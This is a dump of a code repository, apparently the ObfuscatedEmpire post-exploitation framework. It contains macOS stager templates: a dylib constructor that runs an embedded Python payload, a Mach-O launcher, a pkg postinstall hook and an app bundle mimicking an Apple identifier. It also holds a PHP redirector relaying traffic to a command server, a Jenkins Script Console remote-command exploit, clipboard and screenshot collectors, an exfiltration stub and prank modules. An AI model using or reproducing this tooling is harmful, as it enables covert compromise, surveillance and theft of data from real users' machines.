qzM7hpyjTG1HuQPURuKEoahDSKQ= 24 | 25 | hash2 26 | 27 | ZXrFHjOdrZig+0unotC+3J2bMrEBQMMgmgLfXQBAB0k= 28 | 29 | optional 30 | 31 | 32 | 33 | rules 34 | 35 | ^Resources/ 36 | 37 | ^Resources/.*\.lproj/ 38 | 39 | optional 40 | 41 | weight 42 | 1000 43 | 44 | ^Resources/.*\.lproj/locversion.plist$ 45 | 46 | omit 47 | 48 | weight 49 | 
1100 50 | 51 | ^version.plist$ 52 | 53 | 54 | rules2 55 | 56 | .*\.dSYM($|/) 57 | 58 | weight 59 | 11 60 | 61 | ^(.*/)?\.DS_Store$ 62 | 63 | omit 64 | 65 | weight 66 | 2000 67 | 68 | ^(Frameworks|SharedFrameworks|PlugIns|Plug-ins|XPCServices|Helpers|MacOS|Library/(Automator|Spotlight|LoginItems))/ 69 | 70 | nested 71 | 72 | weight 73 | 10 74 | 75 | ^.* 76 | 77 | ^Info\.plist$ 78 | 79 | omit 80 | 81 | weight 82 | 20 83 | 84 | ^PkgInfo$ 85 | 86 | omit 87 | 88 | weight 89 | 20 90 | 91 | ^Resources/ 92 | 93 | weight 94 | 20 95 | 96 | ^Resources/.*\.lproj/ 97 | 98 | optional 99 | 100 | weight 101 | 1000 102 | 103 | ^Resources/.*\.lproj/locversion.plist$ 104 | 105 | omit 106 | 107 | weight 108 | 1100 109 | 110 | ^[^/]+$ 111 | 112 | nested 113 | 114 | weight 115 | 10 116 | 117 | ^embedded\.provisionprofile$ 118 | 119 | weight 120 | 20 121 | 122 | ^version\.plist$ 123 | 124 | weight 125 | 20 126 | 127 | 128 | 129 | 130 | -------------------------------------------------------------------------------- /data/misc/apptemplateResources/x86/launcher.app/Contents/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BuildMachineOSBuild 6 | 15G31 7 | CFBundleDevelopmentRegion 8 | en 9 | CFBundleExecutable 10 | launcher 11 | CFBundleIdentifier 12 | com.apple.launcher 13 | CFBundleInfoDictionaryVersion 14 | 6.0 15 | CFBundleName 16 | launcher 17 | CFBundlePackageType 18 | APPL 19 | CFBundleShortVersionString 20 | 1.0 21 | CFBundleSignature 22 | ???? 23 | CFBundleSupportedPlatforms 24 | 25 | MacOSX 26 | 27 | CFBundleVersion 28 | 1 29 | DTCompiler 30 | com.apple.compilers.llvm.clang.1_0 31 | DTPlatformBuild 32 | 7D1014 33 | DTPlatformVersion 34 | GM 35 | DTSDKBuild 36 | 15E60 37 | DTSDKName 38 | macosx10.11 39 | DTXcode 40 | 0731 41 | DTXcodeBuild 42 | 7D1014 43 | LSMinimumSystemVersion 44 | 10.11 45 | LSUIElement 46 | 47 | NSHumanReadableCopyright 48 | Copyright © 2016 Apple. All rights reserved. 
49 | NSMainNibFile 50 | MainMenu 51 | NSPrincipalClass 52 | NSApplication 53 | 54 | 55 | -------------------------------------------------------------------------------- /data/misc/apptemplateResources/x86/launcher.app/Contents/MacOS/launcher: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/apptemplateResources/x86/launcher.app/Contents/MacOS/launcher -------------------------------------------------------------------------------- /data/misc/apptemplateResources/x86/launcher.app/Contents/PkgInfo: -------------------------------------------------------------------------------- 1 | APPL???? -------------------------------------------------------------------------------- /data/misc/apptemplateResources/x86/launcher.app/Contents/Resources/Base.lproj/MainMenu.nib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/apptemplateResources/x86/launcher.app/Contents/Resources/Base.lproj/MainMenu.nib -------------------------------------------------------------------------------- /data/misc/apptemplateResources/x86/launcher.app/Contents/_CodeSignature/CodeResources: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | files 6 | 7 | Resources/Base.lproj/MainMenu.nib 8 | 9 | hash 10 | 11 | qzM7hpyjTG1HuQPURuKEoahDSKQ= 12 | 13 | optional 14 | 15 | 16 | 17 | files2 18 | 19 | Resources/Base.lproj/MainMenu.nib 20 | 21 | hash 22 | 23 | qzM7hpyjTG1HuQPURuKEoahDSKQ= 24 | 25 | hash2 26 | 27 | ZXrFHjOdrZig+0unotC+3J2bMrEBQMMgmgLfXQBAB0k= 28 | 29 | optional 30 | 31 | 32 | 33 | rules 34 | 35 | ^Resources/ 36 | 37 | ^Resources/.*\.lproj/ 38 | 39 | optional 40 | 41 | weight 42 | 1000 43 | 44 | ^Resources/.*\.lproj/locversion.plist$ 45 | 46 | omit 47 | 48 | weight 49 | 
1100 50 | 51 | ^version.plist$ 52 | 53 | 54 | rules2 55 | 56 | .*\.dSYM($|/) 57 | 58 | weight 59 | 11 60 | 61 | ^(.*/)?\.DS_Store$ 62 | 63 | omit 64 | 65 | weight 66 | 2000 67 | 68 | ^(Frameworks|SharedFrameworks|PlugIns|Plug-ins|XPCServices|Helpers|MacOS|Library/(Automator|Spotlight|LoginItems))/ 69 | 70 | nested 71 | 72 | weight 73 | 10 74 | 75 | ^.* 76 | 77 | ^Info\.plist$ 78 | 79 | omit 80 | 81 | weight 82 | 20 83 | 84 | ^PkgInfo$ 85 | 86 | omit 87 | 88 | weight 89 | 20 90 | 91 | ^Resources/ 92 | 93 | weight 94 | 20 95 | 96 | ^Resources/.*\.lproj/ 97 | 98 | optional 99 | 100 | weight 101 | 1000 102 | 103 | ^Resources/.*\.lproj/locversion.plist$ 104 | 105 | omit 106 | 107 | weight 108 | 1100 109 | 110 | ^[^/]+$ 111 | 112 | nested 113 | 114 | weight 115 | 10 116 | 117 | ^embedded\.provisionprofile$ 118 | 119 | weight 120 | 20 121 | 122 | ^version\.plist$ 123 | 124 | weight 125 | 20 126 | 127 | 128 | 129 | 130 | -------------------------------------------------------------------------------- /data/misc/hijackers/template.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/hijackers/template.dylib -------------------------------------------------------------------------------- /data/misc/hijackers/template64.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/hijackers/template64.dylib -------------------------------------------------------------------------------- /data/misc/hop.php: -------------------------------------------------------------------------------- 1 | array( 12 | 'method' => 'GET' 13 | ), 14 | 'ssl'=>array( 15 | "verify_peer"=>false, 16 | "verify_peer_name"=>false, 17 | ), 18 | ); 19 | $headers = array('Hop-Name' => $hopName); 20 | if ($optionalHeaders !== null) { 
21 | $headers['Cookie'] = $optionalHeaders; 22 | } 23 | $aContext['http']['header'] = prepareHeaders($headers); 24 | $cxContext = stream_context_create($aContext); 25 | echo file_get_contents($url, False, $cxContext); 26 | } 27 | 28 | 29 | function do_post_request($url, $data, $optionalHeaders = null) 30 | { 31 | global $hopName; 32 | $params = array( 33 | 'http' => array( 34 | 'method' => 'POST', 35 | 'content' => $data 36 | ), 37 | 'ssl'=>array( 38 | 'verify_peer'=>false, 39 | 'verify_peer_name'=>false, 40 | ), 41 | ); 42 | $headers = array('Hop-Name' => $hopName); 43 | if ($optionalHeaders !== null) { 44 | $headers['Cookie'] = $optionalHeaders; 45 | } 46 | $params['http']['header'] = prepareHeaders($headers); 47 | $ctx = stream_context_create($params); 48 | $fp = @fopen($url, 'rb', false, $ctx); 49 | if (!$fp) { 50 | return ''; 51 | } 52 | $response = @stream_get_contents($fp); 53 | if ($response === false) { 54 | return ''; 55 | } 56 | echo $response; 57 | } 58 | 59 | function prepareHeaders($headers) { 60 | $flattened = array(); 61 | 62 | foreach ($headers as $key => $header) { 63 | if (is_int($key)) { 64 | $flattened[] = $header; 65 | } else { 66 | $flattened[] = $key.': '.$header; 67 | } 68 | } 69 | 70 | return implode("\r\n", $flattened); 71 | } 72 | 73 | if ($_SERVER['REQUEST_METHOD'] === 'GET') { 74 | $requestURI = $_SERVER['REQUEST_URI']; 75 | if(isset($_COOKIE['session'])) { 76 | return do_get_request($server.$requestURI, "session=".str_replace(' ', '+', $_COOKIE['session'])); 77 | } 78 | else { 79 | return do_get_request($server.$requestURI); 80 | } 81 | } 82 | 83 | else { 84 | // otherwise it's a POST 85 | $requestURI = $_SERVER['REQUEST_URI']; 86 | $postdata = file_get_contents("php://input"); 87 | 88 | if(isset($_COOKIE['session'])) { 89 | return do_post_request($server.$requestURI, $postdata, "session=".str_replace(' ', '+', $_COOKIE['session'])); 90 | } 91 | else { 92 | return do_post_request($server.$requestURI, $postdata); 93 | } 94 | } 95 | 96 
| ?> 97 | -------------------------------------------------------------------------------- /data/misc/machotemplate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/machotemplate -------------------------------------------------------------------------------- /data/misc/pkgbuild/expand/PackageInfo: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /data/misc/pkgbuild/root/Applications/test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/pkgbuild/root/Applications/test -------------------------------------------------------------------------------- /data/misc/pkgbuild/scripts/postinstall: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | LAUNCHER 4 | 5 | exit 0 -------------------------------------------------------------------------------- /data/misc/templateLauncher.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/templateLauncher.dylib -------------------------------------------------------------------------------- /data/misc/templateLauncher64.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/templateLauncher64.dylib -------------------------------------------------------------------------------- 
/data/misc/templateSource/Dylib.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | void* activateStager() 12 | { 13 | char cmd []= "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; 14 | setlocale(LC_ALL, "en_US.URF-8"); 15 | Py_Initialize(); 16 | PyRun_SimpleString(cmd); 17 | 18 | Py_Finalize(); 19 | return 0; 20 | } 21 | 22 | __attribute__ ((constructor)) 23 | static int initializer() 24 | { 25 | pthread_attr_t attr; 26 | pthread_t posixThreadID; 27 | int returnVal; 28 | 29 | returnVal = pthread_attr_init(&attr); 30 | assert(!returnVal); 31 | returnVal = pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED); 32 | assert(!returnVal); 33 | 34 | int threadError = pthread_create(&posixThreadID, &attr, 
&activateStager, NULL); 35 | 36 | return 0; 37 | } 38 | 39 | 40 | -------------------------------------------------------------------------------- /data/misc/templateSource/macho.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #import 6 | #import 7 | #import 8 | 9 | 10 | int main(int argc, const char * argv[]) { 11 | //Set the locale for Py_Initialize just in case the 12 | NSString *pyCommand = @"UEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FE
UEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQU"; 13 | const char *command = [pyCommand cStringUsingEncoding:NSASCIIStringEncoding]; 14 | setlocale(LC_ALL, "en_US.URF-8"); 15 | Py_SetProgramName(argv[0]); 16 | Py_Initialize(); 17 | PyRun_SimpleString(command); 18 | 19 | Py_Finalize(); 20 | 21 | 22 | return 0; 23 | } 24 | -------------------------------------------------------------------------------- /data/misc/xar-1.5.2.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/xar-1.5.2.tar.gz -------------------------------------------------------------------------------- /data/module_source/code_execution/Invoke-Ntsd.ps1: -------------------------------------------------------------------------------- 1 | 2 | Function Write-Ini([string]$path, [string]$launcher) 3 | { 4 | # -Encoding ASCII is needed otherwise it will write in unicode 5 | # this will cause ntsd to not execute our code 6 | ".shell" | Out-File -Encoding ASCII "$path\ntsd.ini" 7 | "$launcher" | Out-File -Encoding ASCII "$path\ntsd.ini" -Append 8 | } 9 | -------------------------------------------------------------------------------- /data/module_source/code_execution/ntsd_x64.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/module_source/code_execution/ntsd_x64.exe -------------------------------------------------------------------------------- /data/module_source/code_execution/ntsd_x86.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/module_source/code_execution/ntsd_x86.exe -------------------------------------------------------------------------------- /data/module_source/code_execution/ntsdexts_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/module_source/code_execution/ntsdexts_x64.dll -------------------------------------------------------------------------------- /data/module_source/code_execution/ntsdexts_x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/module_source/code_execution/ntsdexts_x86.dll -------------------------------------------------------------------------------- /data/module_source/collection/Get-ClipboardContents.ps1: -------------------------------------------------------------------------------- 1 | function Get-ClipboardContents { 2 | <# 3 | .SYNOPSIS 4 | 5 | Monitors the clipboard on a specified interval for changes to copied text. 6 | 7 | PowerSploit Function: Get-ClipboardContents 8 | Author: @harmj0y 9 | License: BSD 3-Clause 10 | Required Dependencies: None 11 | Optional Dependencies: None 12 | y 13 | .PARAMETER CollectionLimit 14 | 15 | Specifies the interval in minutes to capture clipboard text. Defaults to indefinite collection. 
16 | 17 | .PARAMETER PollInterval 18 | 19 | Interval (in seconds) to check the clipboard for changes, defaults to 15 seconds. 20 | 21 | .EXAMPLE 22 | 23 | Invoke-ClipboardMonitor -CollectionLimit 120 24 | 25 | .LINK 26 | 27 | http://brianreiter.org/2010/09/03/copy-and-paste-with-clipboard-from-powershell/ 28 | #> 29 | 30 | [CmdletBinding()] Param ( 31 | [Parameter(Position = 1)] 32 | [UInt32] 33 | $CollectionLimit, 34 | 35 | [Parameter(Position = 2)] 36 | [UInt32] 37 | $PollInterval = 15 38 | ) 39 | 40 | Add-Type -AssemblyName System.Windows.Forms 41 | 42 | # calculate the stop time if one is specified 43 | if($CollectionLimit) { 44 | $StopTime = (Get-Date).addminutes($CollectionLimit) 45 | } 46 | else { 47 | $StopTime = (Get-Date).addyears(10) 48 | } 49 | 50 | $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff) 51 | "=== Get-ClipboardContents Starting at $TimeStamp ===`n" 52 | 53 | # used to check if the contents have changed 54 | $PrevLength = 0 55 | $PrevFirstChar = "" 56 | 57 | for(;;){ 58 | if ((Get-Date) -lt $StopTime){ 59 | 60 | # stolen/adapted from http://brianreiter.org/2010/09/03/copy-and-paste-with-clipboard-from-powershell/ 61 | $tb = New-Object System.Windows.Forms.TextBox 62 | $tb.Multiline = $true 63 | $tb.Paste() 64 | 65 | # only output clipboard data if it's changed 66 | if (($tb.Text.Length -ne 0) -and ($tb.Text.Length -ne $PrevLength)){ 67 | # if the length isn't 0, the length has changed, and the first character 68 | # has changed, assume the clipboard has changed 69 | # YES I know there might be edge cases :) 70 | if($PrevFirstChar -ne ($tb.Text)[0]){ 71 | $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff) 72 | "`n=== $TimeStamp ===`n" 73 | $tb.Text 74 | $PrevFirstChar = ($tb.Text)[0] 75 | $PrevLength = $tb.Text.Length 76 | } 77 | } 78 | } 79 | else{ 80 | $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff) 81 | "`n=== Get-ClipboardContents Shutting down at $TimeStamp ===`n" 82 | Break; 83 | } 84 | Start-Sleep -s $PollInterval 85 | } 
86 | } 87 | -------------------------------------------------------------------------------- /data/module_source/collection/Get-Screenshot.ps1: -------------------------------------------------------------------------------- 1 | function Get-Screenshot 2 | { 3 | param 4 | ( 5 | [Parameter(Mandatory = $False)] 6 | [string] 7 | $Ratio 8 | ) 9 | Add-Type -Assembly System.Windows.Forms; 10 | $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen; 11 | $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height; 12 | $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject); 13 | $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size); 14 | $DrawingGraphics.Dispose(); 15 | $ms = New-Object System.IO.MemoryStream; 16 | if ($Ratio) { 17 | try { 18 | $iQual = [convert]::ToInt32($Ratio); 19 | } catch { 20 | $iQual=80; 21 | } 22 | if ($iQual -gt 100){ 23 | $iQual=100; 24 | } elseif ($iQual -lt 1){ 25 | $iQual=1; 26 | } 27 | $encoderParams = New-Object System.Drawing.Imaging.EncoderParameters; 28 | $encoderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $iQual); 29 | $jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" } 30 | $ScreenshotObject.save($ms, $jpegCodec, $encoderParams); 31 | } else { 32 | $ScreenshotObject.save($ms, [Drawing.Imaging.ImageFormat]::Png); 33 | } 34 | $ScreenshotObject.Dispose(); 35 | [convert]::ToBase64String($ms.ToArray()); 36 | } 37 | Get-Screenshot -------------------------------------------------------------------------------- /data/module_source/exfil/Invoke-PostExfil.ps1: -------------------------------------------------------------------------------- 1 | 2 | Invoke-PostExfil { 3 | <# 4 | .SYNOPSIS 5 | 6 | Compresses a target folder, breaks it into chunks, and exfils 7 | the parts to a web server. 
8 | 9 | .PARAMETER Folder 10 | 11 | Folder of files to exfil. 12 | 13 | .PARAMETER Server 14 | 15 | Server path to exfil to. 16 | 17 | #> 18 | 19 | function split($inFile, $outPrefix, [Int32] $bufSize){ 20 | 21 | $stream = [System.IO.File]::OpenRead($inFile) 22 | $chunkNum = 1 23 | $barr = New-Object byte[] $bufSize 24 | 25 | while( $bytesRead = $stream.Read($barr,0,$bufsize)){ 26 | $outFile = "$outPrefix$chunkNum" 27 | $ostream = [System.IO.File]::OpenWrite($outFile) 28 | $ostream.Write($barr,0,$bytesRead); 29 | $ostream.close(); 30 | echo "wrote $outFile" 31 | $chunkNum += 1 32 | } 33 | } 34 | } 35 | 36 | 37 | 38 | 39 | # split file into chunks, 40 | # upload to a specified exfil URI 41 | -------------------------------------------------------------------------------- /data/module_source/exploitation/Exploit-Jenkins.ps1: -------------------------------------------------------------------------------- 1 | function Exploit-Jenkins() { 2 | <# 3 | .SYNOPSIS 4 | PowerShell delivery for unauthenticated access to Jenkins Script Console 5 | 6 | .PARAMETER Rhost. 7 | Host to exploit 8 | 9 | .PARAMETER Port 10 | Port to use. 
11 | 12 | .PARAMETER Cmd 13 | Command to run on remote Jenkins Script Console 14 | 15 | .EXAMPLE 16 | Exploit-Jenkins -Rhost 127.0.0.1 -Port 8080 -Cmd whoami 17 | Exploit-Jenkins -Rhost 127.0.0.1 -Port 8080 -Cmd "cmd /c netstat -an" 18 | 19 | .LINK 20 | http://twitter.com/luxcupitor 21 | #> 22 | 23 | [CmdletBinding()] 24 | param( 25 | [Parameter(Mandatory=$True)] 26 | [string] $Rhost, 27 | [Parameter(Mandatory=$True)] 28 | [string] $Cmd, 29 | [Parameter(Mandatory=$False)] 30 | [Int] $Port 31 | ) 32 | Add-Type -Assembly System.Web 33 | $url = "http://"+$($Rhost)+":"+$($Port)+"/script" 34 | 35 | $cookiejar = New-Object System.Net.CookieContainer 36 | $Cmd = $Cmd -replace "\s","','" 37 | $Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd) 38 | # Login 39 | $webrequest = [System.Net.HTTPWebRequest]::Create($url); 40 | $webrequest.CookieContainer = New-Object System.Net.CookieContainer; 41 | $webrequest.Method = "GET" 42 | $webrequest.Credentials = $credCache 43 | if ($cookiejar -ne $null) { $webrequest.CookieContainer = $cookiejar } 44 | $response = $webrequest.GetResponse() 45 | $responseStream = $response.GetResponseStream() 46 | $streamReader = New-Object System.IO.Streamreader($responseStream) 47 | $output = $streamReader.ReadToEnd() 48 | 49 | 50 | $postdata="script=println+new+ProcessBuilder%28%27"+$($Cmd)+"%27%29.redirectErrorStream%28true%29.start%28%29.text&Submit=Run" 51 | $bytearray = [System.Text.Encoding]::UTF8.GetBytes($postdata) 52 | 53 | # Second request 54 | $webrequest = [System.Net.HTTPWebRequest]::Create($url) 55 | $webrequest.Credentials = $credCache 56 | if ($cookiejar -ne $null) { $webrequest.CookieContainer=$cookiejar } 57 | $webrequest.Method = "POST" 58 | $webrequest.ContentType = "application/x-www-form-urlencoded" 59 | $webrequest.ContentLength = $bytearray.Length 60 | $requestStream = $webrequest.GetRequestStream() 61 | 62 | # Post data 63 | $requestStream.Write($bytearray, 0, $bytearray.Length) 64 | $requestStream.Close() 65 | $response = 
$webrequest.GetResponse() 66 | $responseStream = $response.GetResponseStream() 67 | 68 | # Get Response 69 | $streamReader = New-Object System.IO.Streamreader($responseStream) 70 | $output = $streamReader.ReadToEnd() 71 | $null = $output -match "Result
((?si).+?)
" 72 | #Write-Output $matches[1] 73 | #return $output 74 | return $matches[1] 75 | } 76 | -------------------------------------------------------------------------------- /data/module_source/fun/Invoke-Thunderstruck.ps1: -------------------------------------------------------------------------------- 1 | Function Invoke-Thunderstruck 2 | { 3 | [CmdletBinding()] 4 | Param ( 5 | [Parameter(Mandatory = $False, Position = 0)] 6 | [ValidateNotNullOrEmpty()] 7 | [String] $VideoURL = "https://www.youtube.com/watch?v=leJ_wj7mDa0" 8 | ) 9 | 10 | Function Set-Speaker($Volume){$wshShell = new-object -com wscript.shell;1..50 | % {$wshShell.SendKeys([char]174)};1..$Volume | % {$wshShell.SendKeys([char]175)}} 11 | Set-Speaker -Volume 50 12 | 13 | #Create hidden IE Com Object 14 | $IEComObject = New-Object -com "InternetExplorer.Application" 15 | $IEComObject.visible = $False 16 | $IEComObject.navigate($VideoURL) 17 | 18 | Start-Sleep -s 5 19 | 20 | $EndTime = (Get-Date).addseconds(90) 21 | 22 | # ghetto way to do this but it basically presses volume up to raise volume in a loop for 90 seconds 23 | do { 24 | $WscriptObject = New-Object -com wscript.shell 25 | $WscriptObject.SendKeys([char]175) 26 | } 27 | until ((Get-Date) -gt $EndTime) 28 | } -------------------------------------------------------------------------------- /data/module_source/fun/Invoke-VoiceTroll.ps1: -------------------------------------------------------------------------------- 1 | Function Invoke-VoiceTroll 2 | { 3 | [CmdletBinding()] 4 | Param ( 5 | [Parameter(Mandatory = $True, Position = 0)] 6 | [ValidateNotNullOrEmpty()] 7 | [String] $VoiceText 8 | ) 9 | Set-StrictMode -version 2 10 | Add-Type -AssemblyName System.Speech 11 | $synth = New-Object -TypeName System.Speech.Synthesis.SpeechSynthesizer 12 | $synth.Speak($VoiceText) 13 | } 14 | -------------------------------------------------------------------------------- 